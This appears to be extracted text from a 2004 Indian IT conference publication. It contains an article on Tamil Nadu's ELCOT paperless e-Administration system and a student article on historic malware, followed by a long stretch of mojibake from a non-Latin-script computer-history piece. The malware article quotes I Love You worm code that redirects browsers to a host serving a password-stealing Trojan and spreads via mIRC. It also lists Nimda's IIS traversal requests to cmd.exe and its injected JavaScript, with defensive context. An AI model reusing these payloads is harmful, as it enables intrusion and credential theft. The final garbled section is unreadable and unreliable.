promotes joint ventures in electronicscommunication and IT They also help developinfrastructure for the software industry in theform of IT parks and by providing effectivecommunication backbones

LL2BCOMs e-Administration toolallows ELCOT officials to sanction purchasesapprove official activities and transfer filesflawlessly in completely electronic format Witha view to introduce transparency in theirworkflow process all the files processed in theorganisation are made available on a centralserver while the status of pending files can beobtained at any stage There is no physicalmovement of files at any stage only the finalorder copies are printed and stored as physicalrecord

The Nuts and BoltsAs part of its e-governance initiative the

Government of Tamil Nadu embarked on apaper-less office drive for introducingtransparency and accountability in its internaland external transactions

ELCOT the nodal organization for ITactivities in the state decided to introduce e-Administration a paperless FileManagement System which ensures speedydisposal of files The entire process creationmovement monitoring and approval of filestakes place electronically resulting in betterutilisation of manpower This helps avoidingdelays which leads to better governanceaccording to Sudeep Jain IAS MD ELCOT

OITS-2004

33

e-Administration is the brainchild of ICTand e-Gov specialist VDG Krishnan who hasover a quarter of a century hands-on managerialexperience in the Public Sector in India and aleading MNC in North South America He isthe Founder President of Life-Line to Business(LL2BCOM Pvt Ltd) His urge was to developa simple yet effective solution that can help totransform the Governments Corporates SMEsand NGOs The tool was conceived by him afterhis return to India as an apt solution for e-Governance in the developing world based onhis experience in both the developing and thedeveloped world

e-Administration is a web-enabledplatform-independent paperless solutiondeveloped on an Open Source platform forpaperless communication within and outsidean organization It uses open source offeringssuch as J2EE JBOSS PGSQL all running onLinux

The tool according to Krishnan canreduce the cycle time for file approval from anaverage of two to three weeks to one week Thiscan also result in a considerable reduction ofpaper-usage within an organisation therebysaving valuable natural resources

According to Krishnan LL2Bs toolempowers every employee in the organizationto discharge his or her duties efficiently It hasalso reduced the dependence on subordinatesand makes the organization system-orientedrather than people-centric This is likely to resultin increased productivity

Being a Linux platform local languagecontent can also be easily added This tool canbe used by any organization whose activitiesinvolve dealing with multiple agencies forsimultaneous review and action The tool also

aids knowledge management and integrationin NGOs for self-assessment decentralised fieldupdating and centralised review andmonitoring

The ProcessELCOT conducted trials with products

offered by four to five SMEs for independentevaluation with a view to adopt the best toolThe SMEs were asked to implement thenecessary customisations to suit therequirements of ELCOT Govt

Trials were conducted over three to twelvemonths with equal opportunity given to all thevendors In each department one system wasconfigured as the server and five nodes (on anaverage) connected as clients for live testing

Says K Appuswamy General Manager (e-Governance) Many organizations hadconducted trials but only LL2Bs model workedsuccessfully at ELCOT

LL2BCOMs product was one of the fiveLAN based solutions tried out the front-endwas based on Visual Basic while the backendwas Microsoft Access SQL running on aMicrosoft Windows 2000 server in the initialtrials This tool was initially installed inELCOTs Marketing Department for about 5officers Seeing the effective use of the tool moreofficers and staff came forward voluntarily touse the tool Steadily the number was increasedand the solution upgraded to a browser basedweb version for removing the dependence onclient systems

Currently e-Administration systemconnects about 150 users in three differentlocations spread over a distance of about 25 KMsincluding their Corporate Office at Nandanamtheir Communication Division at Perungudy

OITS-2004

34

and their Chairman Mr Vivek Harinarain IASwho is the Secretary IT Govt of Tamil Nadu atthe Secretariat through a dedicated powerfulfour-way Xeon dual Processor with RAIDfacility running a versatile Oracle 9i databaseas backend on Linux advanced server centrallylocated at ELCOT Corporate office

The tool simplifies the process of generatingfiles and enables moving note sheetselectronically for approval Instead of physicallycarrying note sheets for approval from table totable the employees began using the tool Receiptof the e-document was indicated by pop-up alertmessages on the officers monitors

All letters received from external agenciescould now be scanned and converted intoelectronic documents which would then beadded to the central repository This systemenables a user to check the status of a file at anystage More importantly delays are minimisedas the files can be traced instantly through thenetwork employees can now know whichofficer has kept the file pending

The biggest advantage of e-Administration is that it enables us to view atany stage the status of pending file The detailsare available on a central server and can beaccessed by anyone having the authority Thisway workflow is simplified

LL2Bs e-Administration tool not onlyeffects a dramatic reduction of stationary usageand time taken to process documents it alsoserves to introduce transparency in the workingof any organisation

The employees of ELCOT also took to thesystem rather well According to AppuswamyOur employees became more and morecomfortable with using the tool as the trialsprogressed Its quite user-friendly and doesnt

require a lot of technical expertise I myself beganusing the system without any formal trainingand have been using it successfully for eightmonths now

AccoladesAt the 7th National e-Gov conference held

in Chennai in November 2003 MD ELCOTreceived a merit citation award from Governmentof India for implementation of e-Administration as a tool for e-Governance

The Industrial Guidance Bureau of theGovernment of Pondicherry has implementedan integrated e-Platform a quickly customizedsolution of e-Administration to automate theactivities of the Department of Industries andCommerce (Refer Budget 2004-2005 Addressof HE the Lt Governor Pondicherry httpwwwp on nic inopend eptsf in anc elgspeech2004pdf)

Item 7 of the speech reads as followsRemoval of poverty may not be

practically possible without focusing specialattention on creation of gainful jobopportunities The Tenth plan at the nationallevel envisages creation of 50 million newemployment opportunities over a period of fiveyears Therefore focused attention will be givento few critical sectors such as

Industries Information Technology etcwhich have very high employment potential

Item 19 of the speech reads as followsThe manufacturing sector of the economy

has potential to absorb the surplus labour forceThe labour intensive manufacturing units canprovide gainful job opportunities for skilled aswell as semi-skilled labour force We willcontinue to encourage new entrepreneurs tochoose Pondicherry as their destination for

OITS-2004

35

establishing new industrial units andprocedures will be simplified to obtain licence permission to start units We will continue topursue the policies of promoting pollution freeless water and less power consuming industriesin our Union Territory

Item 20 of the speech reads as followsIndustrial Guidance Bureau with

integrated e-Platform has been established bysubstituting single window clearance system tospeed up the process of industrial clearance permission for setting up of new industrial unitsA total of 21 Departments includingMunicipalities Commune Panchayats havebeen integrated with a dedicated electronicnetwork for granting permission to set up anindustry and also to commence production

This saves a lot of time effort and cost toindustrialists and citizens as well as officials ofvarious Departments As against submitting 10copies of documents in the manual system inthe electronic system only one signed copy needsto be submitted thereby saving 90 of paperresulting in conserving of natural forestresources

A unique initiative being attempted for thefirst time in India 21 Departments includingmunicipalities and Panchayats are connectedon a simple dial-up The central repository serverwill be located at the District Industries CentrePondicherry This will form a dedicatedelectronic network The network will allow theGovernment to grant permission for example toset up an industry it can also help amanufacturing unit obtain a Licence tocommence production etc

Says Krishnan This would save a lot oftime effort and cost to industrialists and citizensas well as officials of various Departments As

opposed to submitting 10 copies of documentsin the manual system in the electronic systemonly one signed copy needs to be submittedthereby helping save paper It can help to fuelinvestment in the State and generateemployment for local people

Such an integrated e-Platform can be usedby the ministries and Undertakings of theCentral Government as well as various StateGovernments where ever multiple agencies areinvolved in scrutinizing applications andgranting time bound clearances for planapproval building constructions setting-upindustries etc It can bring about the muchdesired transparency and accountability

Various Central and State GovernmentDepartments and Undertakings including theAndhra Pradesh Technology Services theGovernments of West Bengal Orissa ManipurGoa etc State Bank of India the CanadianConsulate in Chennai British Trade Office(Bangalore) Ministry of Industrial DevelopmentMalaysia and the State of Sarawak Malaysiahave shown interest in e-Administration aweb enabled solution developed using opensource This can considerably cut down thebudget expenditure for e-Governance accordingto Krishnan

Instead of resting on their laurels LL2Bplans to reach out to the various GovernmentDepartments and Undertakings as well asCorporates SMEs and NGOs by implementingtheir solutions in as many public and privateorganisations as possible in India and thedeveloping world by offering the basic solutionfree and charging only for the customisationinstallation training hand holding annualmaintenance and upgrade support eitherdirectly or through ELCOT with whom LL2Bhas a marketing tie-up This is expected to benefit

OITS-2004

36

vastly Governments in India and the developingworld by saving on e-Governance expenditureWe are currently holding discussions with theChennai Metropolitan Development Authority(CMDA) and The Tamil Nadu Dr MGRMedical University to implement e-Administration in their offices institutionsacross the city says Krishnan

Shri D Jayakumar the Hon Minister forIT Govt of Tamil Nadu had stated in the StateAssembly

The Government has also decided to takeup development of four generic softwares paperless office electronic delivery of servicesdevelopment of government portal andintegrated district information system

Of these the paperless office was alreadyin place in ELCOT

While its naiumlve to believe that e-Administration paperless office solutions likeLL2Bs may just be the panacea for our red-taperidden bureaucracy it certainly is a step in theright direction one small step for e-governance a giant leap for democracy

Why ELCOT took the plunge

1 The number of major departments 42 The average number of files generated per

department per year 1503 The average number of physical

movements per file 204 The average number of cycles per file from

start to end 8The total number of manual entries file

movement from desk-to-desk per year4x150x20x8 = 96000 manual entries or filemovements per year

The workload is not evenly distributed asit depends on a hierarchy for granting sanctionandor approval of files The Managing Director(MD) typically has to view and approveapproximately 200 files per week That is anaverage of 40 files per working day This is apartfrom the various meetings he has to attend Filespile up when he is on tour and he is forced tocarry work home When the officer is away filesare kept pending The officer may not even knowthat there are files pending even if they are urgentThese problems cause inordinate delays in theworkflow process A tool such as e-Administration ensures prompt disposal of filesand access to a central database where the statusof files can be monitored at every stage thusensuring efficiency and transparency

Sudeep Jain MD ELCOT confirms thatwhile average cycle time for file approval wasearlier 15 to 21 days after the implementationof the electronic system it was brought down to5 to 7 days

Source E-ADMINISTRATION THE KEY FOR E-GOVERNANCE - INITIATIVES FORCREATING A PAPERLESS OFFICE bySudeep Jain IAS Managing Director ELCOTChennai-35 presented at the 7th National e-Gov Conference in Nov 2003 conducted by theDepartment of Administrative Reforms andPublic Grievances Ministry of PersonnelPublic Grievances and Pension Govt of India

Further enquiries on e-Administration or onimplementing e-Governance Corporate Governancemay be addressed to Mr Krishnan at krisdevgamilcom

OITS-2004

37

Intruders who access networks and systems without authorization or inside attackers withmalicious motives can plant various types of programs to cause damage to the network Theseprograms often lumped together under the general term viruses although other varieties have costcompanies and individuals billions of dollars in lost data lost productivity and the time andexpense of recovery Some of the more destructive examples of malicious code also sometimesreferred to as malware [MALicious softWARE - mark the uppercase MALWARE] over the pastdecade are CIHChernobyl Melissa Code Red Nimda Klez

Now Im going to explain about the two most popular malwares - some exploits which thesemalwares used but NOT how the whole code worked or how to code a malware to exploit

I Love You Worm

The I Love You virus is a little more bulky so I chose not to include the entire script here Youcan download all of the I Love You source from httpwwwpacketstormsecurityorgviral-dblove-letter-sourcetxt

What is interesting to note about the I Love You virus is that it randomly changed the usersdefault Web browser homepage to one of four locations as seen here by the code

num = Int((4 Rnd) + 1)if num = 1 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~young1sHJKhjnwerhjkxcvytwertnMTF wetrdsfmhPnjw6587345gvsdf7679njbvYTWIN-BUGSFIXexe

elseif num = 2 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~angelcatskladjflfdjghKJnwetryDGF ikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4wWIN-BUGSFIXexe

elseif num = 3 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~koichijf6TRjkcbGRpGqaq198vbFV5hfFE kbopBdQZnmPOhfgER67b3VbvgWIN-BUGSFIXexe

elseif num = 4 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~chusdgfhjksdfjklNBmnfgkKLHjkqwtuHJB hAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234 iuy7thjgWIN-BUGSFIXexe

end ifend if

Known Malware ExploitationAbhishek Bhuyan

KIIT Student

OITS-2004

38

The WIN-BUGSFIXexe turned out to be a Trojan application designed to steal passwordsNow a quick look notices all of the URLs present are on wwwskyinetnet This resulted in manyplaces simply blocking access to that single host While bad for skyinetnet it was an easy fix foradministrators Imagine if the virus creator has used more popular hosting sites such as the membershomepages of aolcom or even made reference to large sites such as yahoocom and hotmailcom would administrators rush to block those sites as well Perhaps not Also had someone at skyinetnetbeen smart they would have replaced the Trojan WIN-BUGSFIXexe with an application that woulddisinfect the system of the I Love You virus That is if administrators allowed infected machinesto download the Trojaned Trojan

I Love You also modifies the configuration files for mIRC a popular Windows IRC chat clientif (s=mirc32exe) or (s=mlink32exe) or (s=mircini) or(s=scriptini) or (s=mirchlp) thenset scriptini=fsoCreateTextFile(folderspecampscriptini)

scriptiniWriteLine [script]scriptiniWriteLine mIRC ScriptscriptiniWriteLine Please dont edit this script mIRC will corrupt if mIRC willscriptiniWriteLine corrupt WINDOWS will affect and will not run correctly thanksscriptiniWriteLine scriptiniWriteLine Khaled Mardam-BeyscriptiniWriteLine httpwwwmirccomscriptiniWriteLine scriptiniWriteLine n0=on 1JOINscriptiniWriteLine n1= if ( $nick == $me ) halt scriptiniWriteLine n2= dcc send $nick ampdirsystemampLOVE-LETTER-FOR-YOUHTMscriptiniWriteLine n3=scriptinicloseHere we see I Love You making a change that would cause the users IRC client to send a copy

of the I Love You virus to every person who joins a channel that the user is in Of course the filenamehas to be enticing to the users joining the channel so they are tempted into opening the file- Nimda Worm -

In September 2001 a very nasty worm reared its ugly head The Nimda (Just reverse nimdaand you get admin) worm also called the Concept viruswas another worm which propagated viaMicrosoft hostsNimda featured multiple methods to infect a host

It could send itself via e-mail It would attach itself as an encoded exe file but would use anaudiox-wave Multipurpose Internet Mail Extensions (MIME) type which triggered a bug in InternetExplorer to automatically execute the attachment upon previewing the e-mail Once the attachmentwas executed the worm would send itself to people in the users address book as well as e-mailaddresses found on Web pages in Internet Explorers Web page cachethat means the worm wouldactually find e-mail addresses on recently browsed Web pages The worm would scan for vulnerableIIS machines looking for the rootexe files left over from the Code Red II and Sadmind worms aswell as using various Unicode and double-encoding URL tricks in order to execute commands onthe serverThe following is a list of requests made by the worm

GET scriptsrootexec+dir

OITS-2004

39

GET cwinntsystem32cmdexec+dirGET dwinntsystem32cmdexec+dirGET MSADCrootexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scriptsxc1x1cwinntsystem32cmdexec+dirGET scriptsxc0winntsystem32cmdexec+dirGET scriptsxc0xafwinntsystem32cmdexec+dirGET scriptsxc1x9cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scripts2fwinntsystem32cmdexec+dirGET _vti_bin5c5c5cwinntsystem32cmdexec+dirGET _mem_bin5c5c5cwinntsystem32cmdexec+dirGET msadc5c5c5cxc1x1cxc1x1cxc1x1cwinntsystem32

cmdexec+dirOnce the worm found a vulnerable IIS server it would attempt to Trivial File Transfer Protocol

(TFTP) the worm code to the target server It would also modify the IIS server by creating a guestaccount and adding it to the Administrators group It would also create a Windows share of theC drive (using the name C$)

All local hypertext markup language (HTML) and Application Service Provider (ASP) fileswould be modified to include the following code snippet

ltscript language=JavaScriptgtwindowopen(readmeeml null resizable=notop=6000left=6000)ltscriptgtIn addition the worm would copy itself to the readmeeml file The final result was that

unsuspecting Web surfers would automatically download and possibly execute the worm froman infected Web site

The worm copies itself into EML and NWS in various local and network directories If anunsuspecting user uses Windows Explorer to browse a directory containing these files it is possiblethat the automatic preview function of Explorer would automatically execute the worm This wouldallow the worm to propagate over file shares on a local network

The worm also copies itself to richeddll which is an attempt to Trojan Microsoft Officedocuments since documents opened in the same directory as the richeddll binary will load andexecute the Trojan DLL

The end result was a noisy but very effective worm It was noisy because it created many EMLand NWS files on the local system It also modified Web pages on the Web site which made it easyto remotely detect a compromised server But the multi-infection methods proved quite effective andmany people who had run through and removed the worm had found that their systems keptgetting infectedit is a tough worm to fully eradicate To properly combat it the securityadministrator needed to patch their IIS server upgrade their Microsoft Outlook client and be cautiousof browsing network shares Full information on the Nimda worm is available in the Security Focusanalysis

httparissecurityfocuscomalertsnimda010921-Analysis-Nimda-v2pdf

OITS-2004

40

Some tips on prevention and responseProtecting systems and networks from the damage caused by Trojan horses viruses and

worms is mostly a matter of common sense Practices that can help prevent infection include thefollowing Do not run executable (EXE) files from unknown sources including those attached to an e-

mail or downloaded from web sites Turn off the Preview andor HTML mail options in the e-mail client program Do not open Microsoft Office documents from unknown sources without first disabling

macros Be careful about using diskettes that have been used in other computers Install and use firewall software Install antivirus software configuring it to run scans automatically at predefined times and

updating the definition files regularly Use intrusion prevention tools called behavior blockers that deny programs the ability to

execute operations that have not been explicitly permitted Use integrity checker software (such as Tripwire) to scan the system for changes Recognizing the presence of a malicious code is the first-response step if a system gets infected

Administrators and users need to be on the alert for common indications that a virus mightbe present such as the followingMissing files or programsUnexplained changes to the systems configurationUnexpected and unexplained displays messages or soundsNew files or programs that suddenly appear with no explanationMemory leaks (less available system memory than normal)Unexplained use of disk spaceAny other odd or unexplained behavior of programs or the operating system

- If a virus is suspected a good antivirus program should be installed and run to scan thesystem for viruses and attempt to remove or quarantine any that are found Finally allmission-critical or irreplaceable data should be backed up on a regular basis in case all thesemeasures fail

Virus writers are a creative and persistent bunch and will continue to come up with new waysto do the impossible so computer users should never assume that any particular file type or OSis immune to malicious code The only sure way to protect against viruses is to power down thecomputer and leave it turned off -)

Information about specific viruses and instructions on how to clean an infected system isavailable at httpwwwsymanteccom and httpwwwmcafeecom Both antivirus vendorsprovide detailed databases that list and describe known viruses But I recommend being touch withthe site httpwwwsecuritynewsportalcom here you will get hourly updates about latest securityhacking virus and trojan news

luckylucky-webnethttpwwwlucky-webnet

Orissa Network Security Group httpgroupsyahoocomgrouporissa-netsec

OITS-2004

41

LOtilde`EcircOcircVethornethorn S_ecirc J aTHORNLETHhOgraveSOcircETH[THORN eamp_ OgravekthornETH[ETH

LTHORNVccedil XTHORNcccedilXccedil aTHORNhegraveaTHORN]OcircETHfmacrAElig bEcircthornaOgrave_hegraveethorn

ASTHORNLETHmTHORNthorn LfETH aTHORNsETH_ aETHZTHORNSOcirc ethornETHS_Ntilde[THORNHaOtilde agrave_Ntilde[THORN A]THORN jcordfAElig Ogravel[oumlOgraveethorn LOtilde`EcircOcircVeethornthornakEcircthornf aOcircakthornETHethorn OgravekthornDRTHORNfrac14frac14ETH Ograve[ZEcirc HkTHORNthorn dsectAEligVTHORNaTHORNimacrAEligOgraveethorn LTHORNRTHORN SETHZTHORNaETH Acethorn jETHcETHSTHORNL LragravethornaOcircfrac14frac14ETHd]THORNJ LOtilde`EcircOcircVethorn aTHORNsETH_ HL A^Ecirc_THORNL aTHORN]OcircETHbthornETHaOgraveethorn `eTHORNthornNZTHORN[ HkthornETH `EcircethornETH[_ dEcircNeEcircthorn aTHORNhegraveethornjcordfAElig aTHORN]OcircETHOgraveethorn Aacutecurren akEcircthornOgrave[ D`OgravedETHN OgravekthornETHBAjEcircRTHORNfrac14frac14ETH HL]ETH SOgraveZ XETHbrvbarAEligethorn SOgraveZ LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL HaOtilde jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14 c^OcircOgraveethorn aTHORNaETH]mthornETHNTHORNmthornETHfrac14frac14ETH XETHbrvbarAEligethorn dEcircbrvbarTHORNAEligLOgravemthorn bthornNaETH_ccedil A]ETHcccedilEcircfrac14NYIumlTHORNOgravemthornfrac14frac14ETH Bbccedilthorn OgraveplusmnAEligETH`QETHethorn cETH^OcirccOgraveethorn A]ETHcccedilfrac14NbagravethorneEcircthorn AaTHORNbagravethornETHa OgravekthornOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn joacutefrac12THORNcurrenaYIumlTHORNQETHmTHORNthornmthornETHfrac14frac14ETH Ograve[ZEcirc XETHbrvbarAEligethornNtilde aTHORN]OcircETH kUacutethorn jaagrave EcircethornETH[_frac14frac14ETHHkthornETH hEcircZTHORN jTHORNbTHORNthornmccedilthorn dsectAEligNtilde LkTHORNthornOgravemthorn _UumlETH _UumlETH bthornNaETH_ccedil`otildeOgravec jegraveNagraveLEcirc _THORNcagraveETHZ LOgravemthornfrac14frac14ETH HkthornETH`Ograveethorn `oacuteTHORNaNtildejoacutefrac12THORNcurren OgravekthornmthornETHfrac14frac14ETH OgravejTHORN ETHBUuml jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14ethornAahOcircL[ETH OgravekthornETHBTHORNmthornETHfrac14frac14ETH Ograve[ZEcirc jTHORNbTHORNthornmccedilthorn BampTHORNfrac14_THORN AEligeTHORNOtildethornOgravekthornDRTHORN jaagrave EcircethornETH[_ aTHORN]OcircETHfrac14frac14ETH jaEcirc hEcircZTHORN LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL Aacutecurren kthornjTHORN Drthornethorn Ograve]Ogravemthorn A`ZcETHOgrave_`otildeOgrave[OcircL aTHORN]OcircETHLEcirc HL _THORN~Ugravefrac12curren LotildecOgraveethorn `otildeLETHhLeEcircthornRlaquoTHORNAEligAEligfrac14frac14ETH agraveETH[ccedil HL LETHdagraveOcirc jeTHORNthornaETH `Ograveethorn ]eacuteTHORN[NtildemacrAEligLETHdagraveOcirc LeTHORNthornaETHethorn `w[THORN OgraveLDUuml aTHORN]OcircETHOgraveethorn ethornkTHORNthornRTHORN HkthornETH hEcircZTHORNaETH`Ograveethorn XETHbrvbarAEligethorn HaOtilde jTHORNbTHORNthornmccedilthorn BOtildeSTHORN_THORN AEligethornordfAElig AEligAElig OgravekthornETHB dETHBTHORNOgravemthornfrac14frac14ETH HkthornETHkUacutethorn LOtilde`EcircOcircVethorn aTHORN]OcircETHethorncEumlfcsectAEligfrac14frac14ETH LOtilde`EcircOcircVethornethorn aTHORNaragravethorn_LEcirc _Ecirc OcircETH_ LOgravemthorn

AOgravecdividecETHOgrave_ SETHZTHORN ETHeTHORNthornaETH Ograved A^Ecirc_THORNL LOtilde`EcircOcircVethornethornS_L OgravekthornDRlaquoTHORNAEligAElig QETHmccedilthornjagrave aOcircETHOgraveaSccedilfrac14frac14ETH Ogravej 1834cjTHORNkthornETHOgraveethorn A_ETHmTHORNthornVTHORNLETHmccedilthorn BampTHORNfrac14_ccedil _ETHcLLOtilde`EcircOcircVethornVTHORNH DiexclthornETHa_ LeTHORNthornBOgravemthornfrac14frac14ETH `Ograveethorn `OgraveethornS_ccedil bTHORNthorn_THORNOgravejAtildeccedilcurren AVETH_ETHj$ccedilfrac14 HaOtilde LiacuteTHORNOgrave$frac14ETHXagraveIuml OgraveaeTHORNthorncTHORNhTHORN ABgETH Ogravefrac12currenVccedil macrEcircAElig_THORNbthornethornjTHORNVTHORNOgraveethorn `otildecBOgravemthornOgraveIacuteAEligETH_THORNLccediljccedil (Electronics) LOtilde`EcircOcircVethorn[THORNAeTHORNthorn LeTHORNthornTHORNOgravemthornfrac14frac14ETH HkTHORNthornWETHOgraveethorn kUacutethorn $frac14ETHfrac12currenOgraveSOgrave_Ograveethornj_ccedil (First Generation)LOtilde`EcircOcircVethornethorn S_ecirc OgravekthornETHBTHORNmthornETHfrac14frac14ETH ]eacuteTHORN[NtildemacrAElig aTHORNhegravedEcircwjcmacrAEligOgraveethorn H_THORNALccedil (ENIAC) LOtilde`EcircOcircVethorn _THORNcUgrave[OgravekthornETHBTHORNmthornETHfrac14frac14ETH 1946 cjTHORNkthornETHOgraveethorn _THORNcUgrave[ HkTHORNthornLOtilde`EcircOcircVethornLEcirc ethornMTHORNaETH `ETHBUuml 50 $Ecircfrac14Vccedil x 30 $Ecircfrac14VccedilOethornethorn AahOcircL[ETH OgravekthornETHBTHORNmthornETH HaOtilde HkthornETHethorn JS_THORNmthornETH 30 V_ccedilfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornOgraveethorn 18000bthornOcircETHLEcirccccedil VEcircOcircaccedil (Vaccum tube) mthornETHNTHORNTHORNmthornETHfrac14frac14ETHHkthornETH HL OgravejOgraveLumlAEligOgraveethorn 5000 `dagraveOcirclaquoAElig cTHORNhETHZ(Addition) LeTHORNthorn `ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETH c_EcirciOcircWETHeEcircthorn[OcirclaquoAEligAElig lTHORN otilde THORNmthornETHfrac14 j[ cETH[ouml aragravethorncETH_ethornLOtilde`EcircOcircVethornWETHeEcircthorn dOgravefrac12curren cxethorn THORNmthornETHfrac14frac14ETH `Ograveethorn `Ograveethorn1948 cjTHORNkthornETHOgraveethorn HLVagrave HaOtilde cOcircETHLccedilOgravemthorn cTHORNhTHORNHXccedilbthornETHLccedil (EDVAC) _ETHcL HL D_iuml[cETH_ethornLOtilde`EcircOcircVethornVTHORNH Ograve`_ccediljTHORNmccedilthornbthornETH_THORNAUuml aTHORNhegraveaTHORN]OcircETHfmacrAEligOgraveethornDiexclthornETHa_ LOgravemthornfrac14frac14ETH 1951Ograveethorn ]EcircOgravekthornUuml cTHORNhTHORN Ogravej_ccediljjccedilaEcircOcircOgraveethornETH (Census beaureau)Ograveethorn aOcircakthornETHethorn

OITS-2004

42

`ETHBUuml macrEcircAElig_THORNbthornETHLccedil LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LOgravemthornfrac14frac14ETH HTHORNOgraveethornQEcirccegraveLNtildemacrAElig OgraveV`ccedilOgraveethorn [Ocirc ethornkTHORNthornaETH Aethorncdivide OgravekthornmthornETHfrac14frac14ETHHkthornETH OgravekthornDRTHORN `otildec aOcircajETHmacrTHORNAEligL bTHORNthornrTHORNthornOgraveethorn aOcircakoacutethorn[LOtilde`EcircOcircVethornfrac14frac14ETH HkTHORNthorn `otildec `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn [oacuteVTHORNdEcircbrvbarAEligTHORNmthornETH HaOtilde Ograve_L SETHNETH cETHXIumlTHORN ajEcircTHORNmthornETHfrac14frac14ETH 1947cjTHORNkthornETHOgraveethorn Ograveamccedilthorn mthornETHOgraveaETHOgraveethornOgraveVETHeTHORNthornOgraveethorn (Bell Lab)VoumlETH_ccedilSTHORNfrac12currenethornethorn DiexclthornETHa_ OVTHORNTHORNmthornETHfrac14frac14ETH bthornOcircETHLEcirccccedil VEcircOcircaccedila]fOgraveethorn VoumlETH_ccedilSTHORNfrac12currenethornethorn aOcircakthornETHethorn ]eacuteTHORN[NtildemacrAElig `THORNYIumlNtildeethornLOtilde`EcircOcircVethornLEcirc S_ecirc Ograve]mthornETHfrac14frac14ETH Lcccedil Mnagrave OgraveRETHV ALETHethornHaOtilde ^THORNL aTHORNhegraveordfAElig OgravekthornETHBTHORNaETHeEcircthorn HkTHORNthorn `THORNYIumlNtildeethornLOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBmthornETHfrac14frac14ETH cETH[ouml NETHZTHORN[THORNLHaOtilde aOcircajETHmacrTHORNAEligL aTHORNOgravehyacuteiZ `ETHBUuml ]EcircB`otildeLETHethornethorn`w[THORN aOcircakoacutethorn[ OgravekthornDTHORNmthornETH dETHkthornETHLTHORN [OcirclaquoAEligAElig MnagraveETHlaquoAEligAEligaOcircETH`ETHethorn THORNmthornETHfrac14frac14ETH 1958Ograveethorn BAtildeTHORNcurrenOgraveNotildeOgraveVXccedil jLUgraveVccedil(Integrated circuit) DiexclthornETHaTHORN[ OgravekthornaETH`OgraveethornXTHORNSTHORNVETHmccedilthorn LOgrave`agraveETHOgraveethornj_ccedil (DigitalCorporation) OgraveNETHVTHORNH cTHORN_THORN LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETH dETHkthornETHLTHORN 15000 XmthornETHethornccedilOgraveethorn aTHORNLotildeTHORNOgravekthornETHBTHORNmthornETHfrac14frac14ETH `Ograveethorn ABaTHORNHcccedil (IBM) c^Ocirc[ETHethorn 360 jTHORNeTHORNthornSccedil (series) LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETHfrac14frac14ETH HkTHORNthornjaEcirc LOtilde`EcircOcircVethornNEcircXIumlTHORNL [oacute[NtildemacrAElig `THORNYIumlNtildeLOtilde`EcircOcircVethorn bthornETHaOgraveethorn `eTHORNthornNZTHORN[frac14frac14ETH `otildeOgravecOgrave`otildeETHNotildeETHcccedilethorncETHOgrave_ `iacuteNccedil OgraveaETHXagrave HaOtilde [ETHethorn aOcircakthornETHethornLeTHORNthorn LOtilde`EcircOcircVethorn jkthorn OgravedETHNETHOgravedETHN LeEcircthornTHORNOgravemthornfrac14frac14ETHHTHORNOgraveethorn 0 HaOtilde 1 LEcirc aTHORNbTHORNthorn_iuml YETHqETHOgraveethorn HAtildeoumlTHORNcurrenLethornETHdETHDTHORNmthornETHfrac14frac14ETH `Ograveethorn OgraveLETHamccedilthorn HaOtilde $frac14ethornccedilVoumlETH_ccedil `eTHORNthornbthornETHiETH HkTHORNthorn Lfrac12currenLethorn `w[THORNLEcirc jethornf LeTHORNthornOgrave]mthornETHfrac14frac14ETH1971 cjTHORNkthornETHOgraveethorn BOgraveAtildecurrenmccedilthorn _ETHcL HL LshyAEligETH_NtildecETHBOgraveLotildeETHOgrave`otildeETHOgravejjeccedilthorn (Microprocessor)

[THORNAeTHORNthorn LmthornETHfrac14frac14ETH HkthornETH kthornSETHethorn kthornSETHethorn VoumlETH_ccedilSTHORNfrac12currenethornLEcirc_THORNS c^OcircOgraveethorn HL OgraveRETHV QTHORN ccedil cETH^OcirccOgraveethorn ethornMTHORN`ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETHethorn D`ugraverTHORNthorn kUacutethorn Q[Ecircagrave `THORNYIumlNtildeLOtilde`EcircOcircVethornethorn S_ecirc OVETHBmthornETHfrac14frac14ETH HkthornETHethorn D`OgravedETHNOgravekthornaETH$frac14fOgraveethorn LOtilde`EcircOcircVethornethorn ALETHethorn AhETH[Ntilde[bthornETHaOgraveethorn LcTHORNNmthornETHfrac14frac14ETH Lcccedil Mnagrave HaOtilde ^THORNL OgraveaNHkthornETHLEcirc ^THORNL OgravemthornETHL`otildeTHORN AElig LethornETHBmthornETHfrac14frac14ETH 1981OgraveethornABaTHORNHcccedil (IBM) LshyAEligETH_Ntilde [ETHethorn `otildec`jagrave_ETHmccedilthorn LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornVETHBcccedil cETHNETHSTHORN_ccedil (Time Magazine) HkthornETHLEcircMan of the Year AMOcircETH Ograve]mthornETHfrac14frac14ETH Q[Ecircagrave`THORNYIumlNtildeethorn LOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBaETHeEcircthorn HkthornETHLEcircLTHORN eTHORNthorn Ograve]szlig_tTHORN_ LETHdagraveOcircOgraveethorn aOcircakthornETHethorn LeTHORNthornOgravekthornaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ 